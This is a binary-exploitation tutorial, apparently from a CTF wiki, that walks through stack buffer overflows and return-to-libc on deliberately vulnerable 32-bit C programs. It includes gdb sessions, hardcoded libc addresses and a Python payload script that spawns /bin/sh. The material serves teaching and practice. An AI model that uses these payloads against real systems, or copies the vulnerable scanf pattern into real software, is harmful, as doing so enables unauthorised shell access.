Skip to content

Return to Libc

Bring on the shell!

Right, so you just redirected the control flow to execute the win function. Previously win() just printed out “Win” on to the screen. Now consider the same stack-example.c file, but this time we change the definition of win.

/* stack-example-shell.c */

#include <stdio.h>
#include <stdlib.h>

void win()
{
  system("/bin/sh");
  exit(0);
}

void vuln()
{
  char arr[0x10];
  scanf("%s",arr);
  printf("Input  : %s",arr);
}

int main()
{
  vuln();
  return 0;
}

Binary file: stack-example-shell

Before we even go into disassembling this, what do think the system function does? It basically executes a shell command. The argument that is passed to it is “/bin/sh”, so the whole statement system(“/bin/sh”) is basically equivalent to typing /bin/sh on the terminal. Let’s do exactly just that and type /bin/sh on the terminal. What did you get? This is a shell, similar to bash, but less advanced. Try typing commands like pwd, ls, whoami etc and observe the output. Thus we can see that system(“/bin/sh”) will land us a shell.

Now let’s see the disassembly of vuln -

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
       0x0804846b <+0>: push   ebp
       0x0804846c <+1>: mov    ebp,esp
       0x0804846e <+3>: sub    esp,0x10
       0x08048471 <+6>: lea    eax,[ebp-0x10]
       0x08048474 <+9>: push   eax
       0x08048475 <+10>:    push   0x8048530
       0x0804847a <+15>:    call   0x8048350 <__isoc99_scanf@plt>
       0x0804847f <+20>:    add    esp,0x8
       0x08048482 <+23>:    lea    eax,[ebp-0x10]
       0x08048485 <+26>:    push   eax
       0x08048486 <+27>:    push   0x8048533
       0x0804848b <+32>:    call   0x8048330 <printf@plt>
       0x08048490 <+37>:    add    esp,0x8
       0x08048493 <+40>:    nop
       0x08048494 <+41>:    leave  
       0x08048495 <+42>:    ret

As you can see, this time we only have to give 0x10 bytes of junk data and then 4 more bytes for ebp, to reach the saved eip. After that we overwrite the saved eip with the address of win. Let’s find the address of win first -

1
2
3
4
5
(gdb) info functions win
All functions matching regular expression "win":

Non-debugging symbols:
0x080484cb  win

Now let’s write the payload and send it.

1
2
3
4
5
6
7
8
9
(gdb) ! python -c 'print "A"*0x14+"\xcb\x84\x04\x08"' > /tmp/inp
(gdb) b*vuln+42
Breakpoint 1 at 0x804850c
(gdb) r < /tmp/inp
Starting program: /home/vignesh/Documents/stack-example-shell < /tmp/inp

Breakpoint 1, 0x0804850c in vuln ()
(gdb) si
0x080484cb in win ()

Outside gdb, we can get a proper shell. ./stack-example-shell < /tmp/inp will give the shell alright, but the issue will be that the shell will close before you can givve any input. To keep the shell open you can do this -

1
2
3
(cat /tmp/inp;cat) | ./stack-example-shell 
ls
stack-example-shell  stack-example-shell.c

The first cat /tmp/inp prints the payload and the second cat keeps the shell open. We redirect the input with a pipe in this case.

So, how does getting the binary to spawn a shell progress us from just a simple printf statement? Well, currently we ran the binary and the exploit locally on our own system. Now imagine that the binary is hosted on a server somewhere and you send the payload as an input. What happens? Yes, you get a shell on the server! With the shell, you can do almost anything on the server. Thus in most cases, our aim will be to redirect control flow and get a shell.

A bit about libc

Every time you write a C program, you are sure to use one or the other of the inbuilt functions, like printf, scanf, puts etc. Have you wondered where the definitions of these functions lie? All the standard C functions have been compiled into a single file, named the standard C library or the libc. A libc is native to the system that you are working on and is independent of the binary (compiled program). You can use the ldd command to find out which libc is being used by an application.

1
2
3
4
$ ldd ./ret2libc
    linux-gate.so.1 =>  (0xf76df000)
    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74fd000)
    /lib/ld-linux.so.2 (0xf76e0000)

Thus /lib/i386-linux-gnu/libc.so.6 is the libc that is being used by the binary. The libc is ‘linked’ to the binary at execution time. Thus, if you just load a binary into gdb and then try doing disas puts you will not get the actual disassembly of the puts function. This is because the program is not currently running and thus the libc is not yet loaded. Whereas, once the program is running, you can see the full disassembly of puts or any other libc function for that matter.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
(gdb) disas puts    -No libc loaded thus puts will not exist right now
No symbol table is loaded.  Use the "file" command.
(gdb) start     -Start executing the binary. Libc gets loaded now
Temporary breakpoint 1 at 0x8048499
Starting program: /home/vignesh/Documents/a.out

Temporary breakpoint 1, 0x08048499 in main ()
(gdb) disas puts    -Now libc is loaded and thus puts exists
Dump of assembler code for function _IO_puts:
   0xf7e55ca0 <+0>: push   ebp
   0xf7e55ca1 <+1>: mov    ebp,esp
   0xf7e55ca3 <+3>: push   edi
   0xf7e55ca4 <+4>: push   esi
   0xf7e55ca5 <+5>: push   ebx
   ....

Understanding the libc is pretty important from an exploitation point of view as we can redirect the control flow to libc functions as we will see in the following section. Since a libc file is native to a system, each of us can have a different libc file. Thus for comprehensibility between the libc addresses used in this wiki and those while you try out the challenges yourself, we will provide the libc file along with the binary. To run programs with a libc file other than your host libc, you can used the LD_PRELOAD environment variable. For example, if you want to use a libc - libc.so - instead of your original one, you can set LD_PRELOAD to path of the libc function

1
2
3
$ ls
a.out  libc.so
$ export LD_PRELOAD=./libc.so

Within gdb, you can set LD_PRELOAD like this -

(gdb) set environment LD_PRELOAD=./libc.so

Return-to-libc

So now you know what a buffer overflow vulnerability is and also how to use it to control the flow to the application and execute an address of our choice. In the previous section, we directed the control flow to execute a function called win. With the help of this function we spawned a shell. But you might be wondering, surely no real world programs would contain such helpful functions like our ‘win’? Well, you are right there. But what most of the applications do have access to would is the standard C shared library or ‘libc’.

The libc contains all the standard functions that can be used by any C program. The ‘win’ function previously used, actually called the C function, ‘system’, which executes a shell command. The system function, as already mentioned, is a standard C function, which means that it will surely exist in the libc. If you check out the man page of ‘system’, then you will notice that the argument is actually a pointer to the command to be executed. The string “/bin/sh” will also be present in the libc, and thus getting a pointer is just to note the address of this string.

So before proceeding further, let’s get our aim clear. We want to exploit a simple buffer overflow bug, the same as the previous section, but this time there will be no ‘win’ type functions to make life easy for us. For our example, the aim will be to get our vulnerable application to spawn a shell. Thus we need to overwrite the return address with the address of ‘system’ function and provide the argument as a pointer to “/bin/sh”

Ok, three paras of theory is more than enough! Let’s get our hands dirty now. We’ll use the same code as in the previous section, but without the win function.

/* ret2libc.c */

#include <stdio.h>

void vuln()
{
  char arr[0x10];
  scanf("%s",arr);
  printf("Input  : %s",arr);
}

int main()
{
  vuln();
  return 0;
}

Binary file: ret2libc

libc: libc.so.6

First let’s take a look a the disassembly of main -

1
2
3
4
5
6
   0x08048496 <+0>: push   ebp
   0x08048497 <+1>: mov    ebp,esp
   0x08048499 <+3>: call   0x804846b <vuln>
   0x0804849e <+8>: mov    eax,0x0
   0x080484a3 <+13>:    pop    ebp
   0x080484a4 <+14>:    ret

Now here’s the disassembly of vuln -

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
   0x0804846b <+0>: push   ebp
   0x0804846c <+1>: mov    ebp,esp
   0x0804846e <+3>: sub    esp,0x10
   0x08048471 <+6>: lea    eax,[ebp-0x10]
   0x08048474 <+9>: push   eax
   0x08048475 <+10>:    push   0x8048530
   0x0804847a <+15>:    call   0x8048350 <__isoc99_scanf@plt>
   0x0804847f <+20>:    add    esp,0x8
   0x08048482 <+23>:    lea    eax,[ebp-0x10]
   0x08048485 <+26>:    push   eax
   0x08048486 <+27>:    push   0x8048533
   0x0804848b <+32>:    call   0x8048330 <printf@plt>
   0x08048490 <+37>:    add    esp,0x8
   0x08048493 <+40>:    nop
   0x08048494 <+41>:    leave  
   0x08048495 <+42>:    ret

As you can see, this time we only have to give 0x10 bytes of junk data and then 4 more bytes for ebp, to reach the saved eip. Earlier we overwrote the saved eip with the address of the win function, but now we will overwrite it directly with the address of system. Here is how you find the address of system -

1
2
3
4
5
6
7
   (gdb) start
   Temporary breakpoint 1 at 0x8048499 
   Starting program: /home/vignesh/Documents/ret2libc

   Temporary breakpoint 1, 0x08048499 in main ()
   (gdb) print system 
   $1 = {<text variable, no debug info>} 0xf7e5a940 <system>

Thus the address of system is 0xf7e5a940. Let’s craft our input and then run the program with that input

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
   (gdb) b*vuln+42
   Breakpoint 1 at 0x8048495
   (gdb) ! python -c 'print "A" * 0x14 + "\x40\xa9\xe5\xf7"'  > /tmp/inp
   (gdb) r < /tmp/inp    
   Starting program: /home/vignesh/Documents/ret2libc < /tmp/inp
   Breakpoint 1, 0x08048495 in vuln ()
   (gdb) x/i $eip
   => 0x8048495 <vuln+42>:  ret
   (gdb) si
   0xf7e5a940 in system () from ./libc.so.6

Right, so we entered system. But what about the argument? Well, let’s fix that now. Do you remember how arguments are passed to function in x86? Yes, they are pushed on to the stack, in reverse order, before the function is called. So basically, arguments of the function are found, starting from ebp+0x8, ebp+0xc, ebp+0x10 and so on, ebp+0x4 being the return address of the function.

So in our case, the ret instruction at the end of the vuln function is calling system. Thus the stack address which initially contained the saved eip and now contains the address to system(), will be the ebp, when system() is executing. Thus the return address of system is the one directly above (i.e 4 byte’s on top) and then come the arguments. For us there is only one argument and that is the pointer to the string /bin/sh. Let’s find out the address of this string in the libc -

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
(gdb) r < /tmp/inp
Breakpoint 1, 0x08048495 in vuln ()
(gdb) info proc map
process 16302
Mapped address spaces:

Start Addr   End Addr       Size     Offset objfile
 0x8048000  0x8049000     0x1000        0x0 /home/vignesh/Documents/ret2libc
 0x8049000  0x804a000     0x1000        0x0 /home/vignesh/Documents/ret2libc
 0x804a000  0x804b000     0x1000     0x1000 /home/vignesh/Documents/ret2libc
 0x804b000  0x806d000    0x22000        0x0 [heap]
0xf7e1f000 0xf7e20000     0x1000        0x0 
0xf7e20000 0xf7fcd000   0x1ad000        0x0 /home/vignesh/Documents/libc.so.6
0xf7fcd000 0xf7fce000     0x1000   0x1ad000 /home/vignesh/Documents/libc.so.6
0xf7fce000 0xf7fd0000     0x2000   0x1ad000 /home/vignesh/Documents/libc.so.6
0xf7fd0000 0xf7fd1000     0x1000   0x1af000 /home/vignesh/Documents/libc.so.6
0xf7fd1000 0xf7fd5000     0x4000        0x0 
0xf7fd5000 0xf7fd8000     0x3000        0x0 [vvar]
0xf7fd8000 0xf7fd9000     0x1000        0x0 [vdso]
0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib/i386-linux-gnu/ld-2.23.so
0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib/i386-linux-gnu/ld-2.23.so
0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) find 0xf7e20000, 0xf7fd1000 , "/bin/sh"
0xf7f78e8b
1 pattern found.
(gdb) x/s 0xf7f78e8b
0xf7f78e8b: "/bin/sh"

We first find the starting and the ending addresses of libc with info proc map and then use these in the find command. Refer here if you are not clear with the find command.

Thus the 0xf7f78e8b is a pointer to the string /bin/sh. Now let’s put together the whole exploit. Writing the exploit in a separate file, as a python script might prove to be a bit more convenient rather than writing it inline in gdb.

''' exploit.py '''

inp="A"*0x10 # The initial junk bytes to fill u the stack space
inp+="A"*4 # To overwrite the saved ebp
inp+="\x40\xa9\xe5\xf7" # Overwrite the save eip with address of system
inp+="AAAA" # This is the return address of system. Since it will never return, we can give junk here.
inp+="\x8b\x8e\xf7\xf7" #The argument to system. This is the pointer to the string "/bin/sh"

open("/tmp/inp",'w').write(inp) # Open /tmp/inp for writing and put inp in it
''' run "python exploit.py" in the terminal to run this file '''
    (gdb) r < /tmp/inp
    Breakpoint 1, 0x08048495 in vuln ()
    (gdb) c
    process 17735 is executing new program: /bin/dash

Thus the program executed system with the argument “/bin/sh”, resulting in a shell.

Therefore we were able to execute a shell without any helper functions. Instead of system we can redirect the control flow to any standard C function. This technique is known as return-to-libc or ret2libc.

Unfortunately this exploit will not work outside gdb, due to a mitigation technique called Address Space Layout Randomization (ASLR). We will discuss more about this mitigation and how to bypass this in the later sections.